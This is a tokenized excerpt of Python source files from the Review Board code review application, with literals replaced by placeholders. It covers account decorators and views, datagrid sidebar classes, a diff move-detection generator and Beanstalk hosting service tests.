rc <EOL> if rc != <NUM_LIT:0> : <EOL> die ( "<STR_LIT>" ) <EOL> return s <EOL> def run_python ( cmdline , * args , ** kwargs ) : <EOL> return execute ( [ sys . executable ] + cmdline , * args , ** kwargs ) <EOL> def clean_pyc ( ) : <EOL> for root , dirs , files in os . walk ( os . getcwd ( ) ) : <EOL> for filename in files : <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> os . unlink ( os . path . join ( root , filename ) ) <EOL> def parse_options ( args ) : <EOL> global options <EOL> parser = OptionParser ( usage = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> options , args = parser . parse_args ( args ) <EOL> return args <EOL> def main ( ) : <EOL> if len ( sys . argv ) <= <NUM_LIT:2> : <EOL> die ( '<STR_LIT>' ) <EOL> if not os . path . exists ( "<STR_LIT>" ) : <EOL> die ( "<STR_LIT>" ) <EOL> branches = parse_options ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> for branch in branches : <EOL> errcode = execute ( [ '<STR_LIT>' , '<STR_LIT>' , branch ] , <EOL> return_errcode = True , show_output = False ) [ <NUM_LIT:1> ] <EOL> if errcode != <NUM_LIT:0> : <EOL> die ( '<STR_LIT>' % branch ) <EOL> cur_dir = os . getcwd ( ) <EOL> git_dir = clone_git_tree ( cur_dir ) <EOL> print ( '<STR_LIT>' % git_dir ) <EOL> run_python ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % options . db_type , <EOL> '<STR_LIT>' % options . db_name , <EOL> '<STR_LIT>' % options . db_user , <EOL> '<STR_LIT>' % options . db_password ] ) <EOL> for branch in branches : <EOL> execute ( [ '<STR_LIT>' , '<STR_LIT>' , branch ] ) <EOL> clean_pyc ( ) <EOL> run_python ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> run_python ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> os . chdir ( cur_dir ) <EOL> shutil . rmtree ( git_dir ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . decorators import login_required <EOL> from djblets . siteconfig . models import SiteConfiguration <EOL> from djblets . util . decorators import simple_decorator <EOL> from reviewboard . accounts . models import Profile <EOL> @ simple_decorator <EOL> def check_login_required ( view_func ) : <EOL> """<STR_LIT>""" <EOL> def _check ( * args , ** kwargs ) : <EOL> siteconfig = SiteConfiguration . objects . get_current ( ) <EOL> if siteconfig . get ( "<STR_LIT>" ) : <EOL> return login_required ( view_func ) ( * args , ** kwargs ) <EOL> else : <EOL> return view_func ( * args , ** kwargs ) <EOL> return _check <EOL> @ simple_decorator <EOL> def valid_prefs_required ( view_func ) : <EOL> """<STR_LIT>""" <EOL> def _check_valid_prefs ( request , * args , ** kwargs ) : <EOL> if request . user . is_authenticated ( ) : <EOL> Profile . objects . get_or_create ( user = request . user ) <EOL> return view_func ( request , * args , ** kwargs ) <EOL> return _check_valid_prefs </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . decorators import login_required <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import HttpResponseRedirect <EOL> from django . utils . decorators import method_decorator <EOL> from django . utils . functional import cached_property <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . decorators . csrf import csrf_protect <EOL> from djblets . auth . views import register <EOL> from djblets . configforms . views import ConfigPagesView <EOL> from djblets . siteconfig . models import SiteConfiguration <EOL> from djblets . util . decorators import augment_method_from <EOL> from reviewboard . accounts . backends import get_enabled_auth_backends <EOL> from reviewboard . accounts . forms . registration import RegistrationForm <EOL> from reviewboard . accounts . pages import get_page_classes <EOL> @ csrf_protect <EOL> def account_register ( request , next_url = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> siteconfig = SiteConfiguration . objects . get_current ( ) <EOL> auth_backends = get_enabled_auth_backends ( ) <EOL> if ( auth_backends [ <NUM_LIT:0> ] . supports_registration and <EOL> siteconfig . get ( "<STR_LIT>" ) ) : <EOL> response = register ( request , next_page = reverse ( next_url ) , <EOL> form_class = RegistrationForm ) <EOL> return response <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> class MyAccountView ( ConfigPagesView ) : <EOL> """<STR_LIT>""" <EOL> title = _ ( '<STR_LIT>' ) <EOL> css_bundle_names = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> js_bundle_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> @ method_decorator ( login_required ) <EOL> @ augment_method_from ( ConfigPagesView ) <EOL> def dispatch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ property <EOL> def nav_title ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . request . user . username <EOL> @ property <EOL> def page_classes ( self ) : <EOL> """<STR_LIT>""" <EOL> return get_page_classes ( ) <EOL> @ cached_property <EOL> def ordered_user_local_sites ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . request . user . local_site . order_by ( '<STR_LIT:name>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django_evolution . mutations import AddField <EOL> from django . db import models <EOL> MUTATIONS = [ <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . CharField , <EOL> max_length = <NUM_LIT> , null = True ) <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . template . context import RequestContext <EOL> from django . template . loader import render_to_string <EOL> from django . utils import six <EOL> from django . utils . six . moves . urllib . parse import urlencode <EOL> from reviewboard . site . urlresolvers import local_site_reverse <EOL> class BaseSidebarItem ( object ) : <EOL> """<STR_LIT>""" <EOL> template_name = None <EOL> label = None <EOL> icon_name = None <EOL> view_id = None <EOL> view_args = None <EOL> css_classes = None <EOL> def __init__ ( self , sidebar , datagrid ) : <EOL> """<STR_LIT>""" <EOL> self . sidebar = sidebar <EOL> self . datagrid = datagrid <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . view_id and not self . view_args : <EOL> return None <EOL> if self . view_args : <EOL> url_args = self . view_args . copy ( ) <EOL> else : <EOL> url_args = { } <EOL> if self . view_id : <EOL> url_args [ '<STR_LIT>' ] = self . view_id <EOL> return '<STR_LIT>' % ( self . datagrid . request . path , urlencode ( url_args ) ) <EOL> def get_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def is_visible ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def is_active ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . view_id is None : <EOL> return False <EOL> request = self . datagrid . request <EOL> view_id = request . GET . get ( '<STR_LIT>' , self . sidebar . default_view_id ) <EOL> if view_id != self . view_id : <EOL> return False <EOL> if self . view_args : <EOL> for key , value in six . iteritems ( self . view_args ) : <EOL> if request . GET . get ( key ) != value : <EOL> return False <EOL> return True <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> count = self . get_count ( ) <EOL> context = { <EOL> '<STR_LIT>' : self . datagrid , <EOL> '<STR_LIT:label>' : self . label , <EOL> '<STR_LIT>' : self . icon_name or '<STR_LIT>' , <EOL> '<STR_LIT>' : self . view_id , <EOL> '<STR_LIT>' : self . view_args , <EOL> '<STR_LIT:count>' : count , <EOL> '<STR_LIT>' : count is not None , <EOL> '<STR_LIT:url>' : self . get_url ( ) , <EOL> '<STR_LIT>' : self . is_active ( ) , <EOL> '<STR_LIT>' : self . css_classes or [ ] , <EOL> } <EOL> context . update ( self . get_extra_context ( ) ) <EOL> return render_to_string ( self . template_name , <EOL> RequestContext ( self . datagrid . request , context ) ) <EOL> def get_extra_context ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> class BaseSidebarSection ( BaseSidebarItem ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( BaseSidebarSection , self ) . __init__ ( * args , ** kwargs ) <EOL> self . items = list ( self . get_items ( ) ) <EOL> def get_items ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def is_visible ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . items ) > <NUM_LIT:0> <EOL> def get_extra_context ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : self . items , <EOL> } <EOL> class SidebarNavItem ( BaseSidebarItem ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> def __init__ ( self , section , label , icon_name = None , view_id = None , <EOL> view_args = None , count = None , url = None , url_name = None , <EOL> css_classes = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SidebarNavItem , self ) . __init__ ( section . sidebar , section . datagrid ) <EOL> self . label = label <EOL> self . icon_name = icon_name <EOL> self . view_id = view_id <EOL> self . view_args = view_args <EOL> self . count = count <EOL> self . css_classes = css_classes <EOL> self . url = url <EOL> self . url_name = url_name <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . url : <EOL> return self . url <EOL> elif self . url_name : <EOL> return local_site_reverse ( self . url_name , <EOL> request = self . datagrid . request ) <EOL> else : <EOL> return super ( SidebarNavItem , self ) . get_url ( ) <EOL> def get_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . count <EOL> class Sidebar ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , item_classes , default_view_id = None , css_classes = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . _item_classes = [ ] <EOL> self . css_classes = css_classes <EOL> self . default_view_id = default_view_id <EOL> for item_cls in item_classes : <EOL> self . add_item ( item_cls ) <EOL> def add_item ( self , item_cls ) : <EOL> """<STR_LIT>""" <EOL> self . _item_classes . append ( item_cls ) <EOL> def remove_item ( self , item_cls ) : <EOL> """<STR_LIT>""" <EOL> self . _item_classes . remove ( item_cls ) <EOL> def get_items ( self , datagrid ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> item_cls ( self , datagrid ) <EOL> for item_cls in self . _item_classes <EOL> ] <EOL> class DataGridSidebarMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def load_extra_state ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> result = super ( DataGridSidebarMixin , self ) . load_extra_state ( <EOL> * args , ** kwargs ) <EOL> self . sidebar_items = self . sidebar . get_items ( self ) <EOL> return result </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> import re <EOL> from django . utils import six <EOL> from django . utils . six . moves import range <EOL> from reviewboard . diffviewer . processors import ( filter_interdiff_opcodes , <EOL> post_process_filtered_equals ) <EOL> class MoveRange ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , start , end , groups = [ ] ) : <EOL> self . start = start <EOL> self . end = end <EOL> self . groups = groups <EOL> @ property <EOL> def last_group ( self ) : <EOL> return self . groups [ - <NUM_LIT:1> ] <EOL> def add_group ( self , group , group_index ) : <EOL> if self . groups [ - <NUM_LIT:1> ] != group : <EOL> self . groups . append ( ( group , group_index ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . start , self . end , self . groups ) <EOL> class DiffOpcodeGenerator ( object ) : <EOL> ALPHANUM_RE = re . compile ( r'<STR_LIT>' ) <EOL> WHITESPACE_RE = re . compile ( r'<STR_LIT>' ) <EOL> MOVE_PREFERRED_MIN_LINES = <NUM_LIT:2> <EOL> MOVE_MIN_LINE_LENGTH = <NUM_LIT:20> <EOL> TAB_SIZE = <NUM_LIT:8> <EOL> def __init__ ( self , differ , diff = None , interdiff = None ) : <EOL> self . differ = differ <EOL> self . diff = diff <EOL> self . interdiff = interdiff <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . groups = [ ] <EOL> self . removes = { } <EOL> self . inserts = [ ] <EOL> opcodes = self . differ . get_opcodes ( ) <EOL> opcodes = self . _apply_processors ( opcodes ) <EOL> opcodes = self . _generate_opcode_meta ( opcodes ) <EOL> opcodes = self . _apply_meta_processors ( opcodes ) <EOL> self . _group_opcodes ( opcodes ) <EOL> self . _compute_moves ( ) <EOL> for opcodes in self . groups : <EOL> yield opcodes <EOL> def _apply_processors ( self , opcodes ) : <EOL> if self . diff and self . interdiff : <EOL> opcodes = filter_interdiff_opcodes ( opcodes , self . diff , <EOL> self . interdiff ) <EOL> for opcode in opcodes : <EOL> yield opcode <EOL> def _generate_opcode_meta ( self , opcodes ) : <EOL> for tag , i1 , i2 , j1 , j2 in opcodes : <EOL> meta = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> if tag == '<STR_LIT:replace>' : <EOL> assert ( i2 - i1 ) == ( j2 - j1 ) <EOL> for i , j in zip ( range ( i1 , i2 ) , range ( j1 , j2 ) ) : <EOL> if ( self . WHITESPACE_RE . sub ( '<STR_LIT>' , self . differ . a [ i ] ) == <EOL> self . WHITESPACE_RE . sub ( '<STR_LIT>' , self . differ . b [ j ] ) ) : <EOL> meta [ '<STR_LIT>' ] . append ( ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) ) <EOL> if len ( meta [ '<STR_LIT>' ] ) == ( i2 - i1 ) : <EOL> meta [ '<STR_LIT>' ] = True <EOL> elif tag == '<STR_LIT>' : <EOL> for group in self . _compute_chunk_indentation ( i1 , i2 , j1 , j2 ) : <EOL> ii1 , ii2 , ij1 , ij2 , indentation_changes = group <EOL> if indentation_changes : <EOL> new_meta = dict ( { <EOL> '<STR_LIT>' : indentation_changes , <EOL> } , ** meta ) <EOL> else : <EOL> new_meta = meta <EOL> yield tag , ii1 , ii2 , ij1 , ij2 , new_meta <EOL> continue <EOL> yield tag , i1 , i2 , j1 , j2 , meta <EOL> def _apply_meta_processors ( self , opcodes ) : <EOL> if self . interdiff : <EOL> opcodes = post_process_filtered_equals ( opcodes ) <EOL> for opcode in opcodes : <EOL> yield opcode <EOL> def _group_opcodes ( self , opcodes ) : <EOL> for group_index , group in enumerate ( opcodes ) : <EOL> self . groups . append ( group ) <EOL> tag = group [ <NUM_LIT:0> ] <EOL> if tag in ( '<STR_LIT>' , '<STR_LIT:replace>' ) : <EOL> i1 = group [ <NUM_LIT:1> ] <EOL> i2 = group [ <NUM_LIT:2> ] <EOL> for i in range ( i1 , i2 ) : <EOL> line = self . differ . a [ i ] . strip ( ) <EOL> if line : <EOL> self . removes . setdefault ( line , [ ] ) . append ( <EOL> ( i , group , group_index ) ) <EOL> if tag in ( '<STR_LIT>' , '<STR_LIT:replace>' ) : <EOL> self . inserts . append ( group ) <EOL> def _compute_chunk_indentation ( self , i1 , i2 , j1 , j2 ) : <EOL> indentation_changes = { } <EOL> prev_has_indent = False <EOL> prev_start_i = i1 <EOL> prev_start_j = j1 <EOL> for i , j in zip ( range ( i1 , i2 ) , range ( j1 , j2 ) ) : <EOL> old_line = self . differ . a [ i ] <EOL> new_line = self . differ . b [ j ] <EOL> new_indentation_changes = { } <EOL> indent_info = self . _compute_line_indentation ( old_line , new_line ) <EOL> has_indent = indent_info is not None <EOL> if has_indent : <EOL> key = '<STR_LIT>' % ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) <EOL> new_indentation_changes [ key ] = indent_info <EOL> if has_indent != prev_has_indent : <EOL> if prev_start_i != i or prev_start_j != j : <EOL> yield prev_start_i , i , prev_start_j , j , indentation_changes <EOL> prev_start_i = i <EOL> prev_start_j = j <EOL> prev_has_indent = has_indent <EOL> indentation_changes = new_indentation_changes <EOL> elif has_indent : <EOL> indentation_changes . update ( new_indentation_changes ) <EOL> if prev_start_i != i2 or prev_start_j != j2 : <EOL> yield prev_start_i , i2 , prev_start_j , j2 , indentation_changes <EOL> def _compute_line_indentation ( self , old_line , new_line ) : <EOL> if old_line == new_line : <EOL> return None <EOL> old_line_stripped = old_line . lstrip ( ) <EOL> new_line_stripped = new_line . lstrip ( ) <EOL> old_line_indent_len = len ( old_line ) - len ( old_line_stripped ) <EOL> new_line_indent_len = len ( new_line ) - len ( new_line_stripped ) <EOL> old_line_indent = old_line [ : old_line_indent_len ] <EOL> new_line_indent = new_line [ : new_line_indent_len ] <EOL> norm_old_line_indent = old_line_indent . expandtabs ( self . TAB_SIZE ) <EOL> norm_new_line_indent = new_line_indent . expandtabs ( self . TAB_SIZE ) <EOL> norm_old_line_indent_len = len ( norm_old_line_indent ) <EOL> norm_new_line_indent_len = len ( norm_new_line_indent ) <EOL> norm_old_line_len = ( norm_old_line_indent_len + <EOL> len ( old_line_stripped ) ) <EOL> norm_new_line_len = ( norm_new_line_indent_len + <EOL> len ( new_line_stripped ) ) <EOL> line_len_diff = norm_new_line_len - norm_old_line_len <EOL> if line_len_diff == <NUM_LIT:0> : <EOL> return None <EOL> is_indent = ( line_len_diff > <NUM_LIT:0> ) <EOL> if is_indent : <EOL> raw_indent_len = new_line_indent_len <EOL> else : <EOL> raw_indent_len = old_line_indent_len <EOL> raw_indent_len -= len ( os . path . commonprefix ( [ <EOL> old_line_indent [ : : - <NUM_LIT:1> ] , <EOL> new_line_indent [ : : - <NUM_LIT:1> ] , <EOL> ] ) ) <EOL> return ( is_indent , <EOL> raw_indent_len , <EOL> abs ( norm_old_line_indent_len - norm_new_line_indent_len ) ) <EOL> def _compute_moves ( self ) : <EOL> for insert in self . inserts : <EOL> self . _compute_move_for_insert ( * insert ) <EOL> def _compute_move_for_insert ( self , itag , ii1 , ii2 , ij1 , ij2 , imeta ) : <EOL> i_move_cur = ij1 <EOL> i_move_range = MoveRange ( i_move_cur , i_move_cur ) <EOL> r_move_ranges = { } <EOL> move_key = None <EOL> is_replace = ( itag == '<STR_LIT:replace>' ) <EOL> while i_move_cur < ij2 : <EOL> try : <EOL> iline = self . differ . b [ i_move_cur ] . strip ( ) <EOL> except IndexError : <EOL> iline = None <EOL> updated_range = False <EOL> if iline and iline in self . removes : <EOL> for ri , rgroup , rgroup_index in self . removes . get ( iline , [ ] ) : <EOL> r_move_range = r_move_ranges . get ( move_key ) <EOL> if not r_move_range or ri != r_move_range . end + <NUM_LIT:1> : <EOL> move_key = '<STR_LIT>' % rgroup [ <NUM_LIT:1> : <NUM_LIT:5> ] <EOL> r_move_range = r_move_ranges . get ( move_key ) <EOL> if r_move_range : <EOL> if ri == r_move_range . end + <NUM_LIT:1> : <EOL> r_move_range . end = ri <EOL> r_move_range . add_group ( rgroup , rgroup_index ) <EOL> updated_range = True <EOL> else : <EOL> if not is_replace or i_move_cur - ij1 != ri - ii1 : <EOL> r_move_ranges [ move_key ] = MoveRange ( ri , ri , [ ( rgroup , rgroup_index ) ] ) <EOL> updated_range = True <EOL> if not updated_range and r_move_ranges : <EOL> i_move_cur -= <NUM_LIT:1> <EOL> move_key = None <EOL> elif iline == '<STR_LIT>' and move_key : <EOL> r_move_range = r_move_ranges . get ( move_key ) <EOL> if r_move_range : <EOL> new_end_i = r_move_range . end + <NUM_LIT:1> <EOL> if ( new_end_i < len ( self . differ . a ) and <EOL> self . differ . a [ new_end_i ] . strip ( ) == '<STR_LIT>' ) : <EOL> r_move_range . end = new_end_i <EOL> last_group , last_group_index = r_move_range . last_group <EOL> if new_end_i >= last_group [ <NUM_LIT:2> ] : <EOL> cur_group_index = r_move_range . last_group [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> r_move_range . add_group ( <EOL> self . groups [ cur_group_index ] , <EOL> cur_group_index ) <EOL> updated_range = True <EOL> i_move_cur += <NUM_LIT:1> <EOL> if not updated_range or i_move_cur == ij2 : <EOL> if r_move_ranges : <EOL> r_move_range = self . _find_longest_move_range ( r_move_ranges ) <EOL> r_move_range = self . _determine_move_range ( r_move_range ) <EOL> if r_move_range : <EOL> i_range = range ( i_move_range . start + <NUM_LIT:1> , <EOL> i_move_cur + <NUM_LIT:1> ) <EOL> r_range = range ( r_move_range . start + <NUM_LIT:1> , <EOL> r_move_range . end + <NUM_LIT:2> ) <EOL> moved_to_ranges = dict ( zip ( r_range , i_range ) ) <EOL> for group , group_index in r_move_range . groups : <EOL> rmeta = group [ - <NUM_LIT:1> ] <EOL> rmeta . setdefault ( '<STR_LIT>' , { } ) . update ( <EOL> moved_to_ranges ) <EOL> imeta . setdefault ( '<STR_LIT>' , { } ) . update ( <EOL> dict ( zip ( i_range , r_range ) ) ) <EOL> move_key = None <EOL> i_move_range = MoveRange ( i_move_cur , i_move_cur ) <EOL> r_move_ranges = { } <EOL> def _find_longest_move_range ( self , r_move_ranges ) : <EOL> r_move_range = None <EOL> for iter_move_range in six . itervalues ( r_move_ranges ) : <EOL> if not r_move_range : <EOL> r_move_range = iter_move_range <EOL> else : <EOL> len1 = r_move_range . end - r_move_range . start <EOL> len2 = iter_move_range . end - iter_move_range . start <EOL> if len1 < len2 : <EOL> r_move_range = iter_move_range <EOL> elif len1 == len2 : <EOL> r_move_range = None <EOL> return r_move_range <EOL> def _determine_move_range ( self , r_move_range ) : <EOL> """<STR_LIT>""" <EOL> if not r_move_range : <EOL> return None <EOL> end_i = r_move_range . end <EOL> lines = self . differ . a [ r_move_range . start : end_i + <NUM_LIT:1> ] <EOL> new_end_i = None <EOL> valid = False <EOL> for i , line in enumerate ( reversed ( lines ) ) : <EOL> line = line . strip ( ) <EOL> if line : <EOL> if len ( line ) >= <NUM_LIT:4> and self . ALPHANUM_RE . search ( line ) : <EOL> valid = True <EOL> if new_end_i is None or valid : <EOL> new_end_i = end_i - i <EOL> if valid : <EOL> break <EOL> valid = ( <EOL> valid and <EOL> ( new_end_i - r_move_range . start + <NUM_LIT:1> >= <EOL> self . MOVE_PREFERRED_MIN_LINES or <EOL> len ( self . differ . a [ r_move_range . start ] . strip ( ) ) >= <EOL> self . MOVE_MIN_LINE_LENGTH ) ) <EOL> if not valid : <EOL> return None <EOL> assert new_end_i is not None <EOL> return MoveRange ( r_move_range . start , new_end_i , r_move_range . groups ) <EOL> _generator = DiffOpcodeGenerator <EOL> def get_diff_opcode_generator_class ( ) : <EOL> """<STR_LIT>""" <EOL> return _generator <EOL> def set_diff_opcode_generator_class ( renderer ) : <EOL> """<STR_LIT>""" <EOL> assert renderer <EOL> globals ( ) [ '<STR_LIT>' ] = renderer <EOL> def get_diff_opcode_generator ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _generator ( * args , ** kwargs ) </s>
<s> from __future__ import unicode_literals <EOL> SEQUENCE = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . six . moves . urllib . error import HTTPError <EOL> from reviewboard . hostingsvcs . tests . testcases import ServiceTests <EOL> from reviewboard . scmtools . models import Repository , Tool <EOL> class BeanstalkTests ( ServiceTests ) : <EOL> """<STR_LIT>""" <EOL> service_name = '<STR_LIT>' <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_service_support ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . service_class . supports_bug_trackers ) <EOL> self . assertTrue ( self . service_class . supports_repositories ) <EOL> def test_repo_field_values_git ( self ) : <EOL> """<STR_LIT>""" <EOL> fields = self . _get_repository_fields ( '<STR_LIT>' , fields = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> self . assertEqual ( <EOL> fields [ '<STR_LIT:path>' ] , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> fields [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_repo_field_values_subversion ( self ) : <EOL> """<STR_LIT>""" <EOL> fields = self . _get_repository_fields ( '<STR_LIT>' , fields = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> self . assertEqual ( <EOL> fields [ '<STR_LIT:path>' ] , <EOL> '<STR_LIT>' ) <EOL> self . assertNotIn ( '<STR_LIT>' , fields ) <EOL> def test_authorize ( self ) : <EOL> """<STR_LIT>""" <EOL> account = self . _get_hosting_account ( ) <EOL> service = account . service <EOL> self . assertFalse ( service . is_authorized ( ) ) <EOL> service . authorize ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> self . assertIn ( '<STR_LIT:password>' , account . data ) <EOL> self . assertNotEqual ( account . data [ '<STR_LIT:password>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( service . is_authorized ( ) ) <EOL> def test_check_repository ( self ) : <EOL> """<STR_LIT>""" <EOL> def _http_get ( service , url , * args , ** kwargs ) : <EOL> self . assertEqual ( <EOL> url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return '<STR_LIT:{}>' , { } <EOL> account = self . _get_hosting_account ( ) <EOL> service = account . service <EOL> service . authorize ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> self . spy_on ( service . client . http_get , call_fake = _http_get ) <EOL> service . check_repository ( beanstalk_account_domain = '<STR_LIT>' , <EOL> beanstalk_repo_name = '<STR_LIT>' ) <EOL> self . assertTrue ( service . client . http_get . called ) <EOL> def test_get_file_with_svn_and_base_commit_id ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = '<STR_LIT>' , <EOL> expected_revision = '<STR_LIT>' ) <EOL> def test_get_file_with_svn_and_revision ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = None , <EOL> expected_revision = '<STR_LIT>' ) <EOL> def test_get_file_with_git_and_base_commit_id ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = '<STR_LIT>' , <EOL> expected_revision = '<STR_LIT>' ) <EOL> def test_get_file_with_git_and_revision ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = None , <EOL> expected_revision = '<STR_LIT>' ) <EOL> def test_get_file_exists_with_svn_and_base_commit_id ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file_exists ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = '<STR_LIT>' , <EOL> expected_revision = '<STR_LIT>' , <EOL> expected_found = True ) <EOL> def test_get_file_exists_with_svn_and_revision ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file_exists ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = None , <EOL> expected_revision = '<STR_LIT>' , <EOL> expected_found = True ) <EOL> def test_get_file_exists_with_git_and_base_commit_id ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file_exists ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = '<STR_LIT>' , <EOL> expected_revision = '<STR_LIT>' , <EOL> expected_found = True ) <EOL> def test_get_file_exists_with_git_and_revision ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_get_file_exists ( <EOL> tool_name = '<STR_LIT>' , <EOL> revision = '<STR_LIT>' , <EOL> base_commit_id = None , <EOL> expected_revision = '<STR_LIT>' , <EOL> expected_found = True ) <EOL> def _test_get_file ( self , tool_name , revision , base_commit_id , <EOL> expected_revision ) : <EOL> def _http_get ( service , url , * args , ** kwargs ) : <EOL> if tool_name == '<STR_LIT>' : <EOL> self . assertEqual ( <EOL> url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % expected_revision ) <EOL> payload = b'<STR_LIT>' <EOL> else : <EOL> self . assertEqual ( <EOL> url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % expected_revision ) <EOL> payload = b'<STR_LIT>' <EOL> return payload , { } <EOL> account = self . _get_hosting_account ( ) <EOL> service = account . service <EOL> repository = Repository ( hosting_account = account , <EOL> tool = Tool . objects . get ( name = tool_name ) ) <EOL> repository . extra_data = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> service . authorize ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> self . spy_on ( service . client . http_get , call_fake = _http_get ) <EOL> result = service . get_file ( repository , '<STR_LIT>' , revision , <EOL> base_commit_id ) <EOL> self . assertTrue ( service . client . http_get . called ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def _test_get_file_exists ( self , tool_name , revision , base_commit_id , <EOL> expected_revision , expected_found ) : <EOL> def _http_get ( service , url , * args , ** kwargs ) : <EOL> expected_url = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not base_commit_id and tool_name == '<STR_LIT>' : <EOL> expected_url += '<STR_LIT>' % 